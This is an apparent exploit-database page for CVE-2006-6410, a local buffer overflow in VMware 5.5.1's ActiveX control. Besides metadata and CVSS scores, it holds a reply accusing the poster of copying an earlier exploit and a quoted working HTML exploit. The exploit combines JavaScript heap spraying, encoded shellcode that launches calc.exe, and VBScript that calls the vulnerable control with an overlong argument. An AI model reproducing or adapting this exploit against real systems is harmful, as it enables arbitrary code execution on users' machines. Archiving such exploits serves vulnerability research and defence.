VMware 5.5.1 Local Buffer Overflow (HTML Exploit)

2006.12.11
Credit: NormandiaN
Risk: Medium
Local: Yes
Remote: No
CVE: CVE-2006-6410
CWE: CWE-Other


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

NormandiaN the code theif, c0ntex discovered this and released it August 18th 2006, which you pretty much stole everything line for line. Nice job. http://www.milw0rm.com/exploits/2264 /str0ke On 26 Nov 2006 06:05:34 -0000, NormandiaN_MailID (at) yahoo (dot) com [email concealed] <NormandiaN_MailID (at) yahoo (dot) com [email concealed]> wrote: > <html> > <head> > <title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title> > </head> > <body> > <center> > <br> > Discovered By NormandiaN<br> > Visit my website at http://www.grisapka.org<br> > <br> > <h3> > This will exploit overflow and execute calc.exe on WinXP Pro SP2<br> > (fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br> > </h3> > I have only found a bad solution to this bug. Due to the fact that<br> > my controlling assembler is a call dword ptr[reg] I need to point<br> > to a location I control, fine. However my payload is random pretty<br> > much every run. Therefor I fill half a HUGE buffer with the address<br> > (pointer) to my evil buffer, which them trampolines me to shellcode<br> > <br> > call ptr [reg]<br> > [reg] -> 0xtrampoline<br> > 0xtrampoline -> shellcode<br> > <br> > </center> > <script> > var buffa1 = unescape("%uedb0%u0d91") > do { > buffa1 += buffa1; > } > while (buffa1.length < 0x500000); > var buffa2 = unescape("%u9090%u9090") > do { > buffa2 += buffa2; > } > while (buffa2.length < 0x800000); > buffa1 += buffa2; > buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + > "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + > "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + > "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + > "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + > "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + > "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + > "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + > "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + > "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + > "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + > "%uCC4A%uD0FF"); > </script> > <object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744"> > </object> > <script language="vbscript"> > VmdbDb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA > VmdbPoll=200011744 > target.Initialize VmdbDb, VmdbPoll > </script> > </body> >


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top